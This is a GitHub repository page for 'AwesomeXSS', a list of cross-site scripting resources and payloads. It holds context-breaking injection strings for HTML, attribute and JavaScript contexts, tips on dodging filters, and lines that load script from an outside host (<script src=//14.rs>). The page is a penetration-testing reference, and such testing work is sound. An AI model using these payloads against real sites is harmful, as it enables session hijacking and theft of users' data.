Find a file
2018-03-12 12:32:54 +05:30
Database Create event-handlers.md 2018-03-12 12:32:54 +05:30
README.md fixed some typo 2018-03-11 21:35:42 +05:30

AwesomeXSS

Awesome XSS stuff. Put this repo on watch. I will be updating it regularly.

Awesome Books

Awesome Websites

Awesome People

Awesome Reads

Awesome Presentations

Awesome Context Breaking

Simple Context

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//

JavaScript Context

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Awesome Payloads

Come back later

Awesome Exploits

Come back later

Awesome Tags & Event Handlers

Come back later

Awesome Methodology

Come back later

Awesome Tools

Awesome Tips & Tricks

  • http:// can be shortened to //
  • document.cookie can be shortened to cookie. It applies to other DOM objects as well.
  • alert and other pop-up functions don't need a value, so stop doing alert(1) and start doing alert()
  • I have found that confirm is the least detected pop-up function so stop using alert.
  • Quotes around attribute value aren't neccessary. You can use <script src=//14.rs> instead of <script src="//14.rs"&glt;
  • The shortest independent payload is <embed src=//14.rs> (19 chars)

Credits and all that

All the payloads are crafted by me unless specified. Thanks to my big brother Rodolfo Assis whose writings inspired me to become an XSSLord.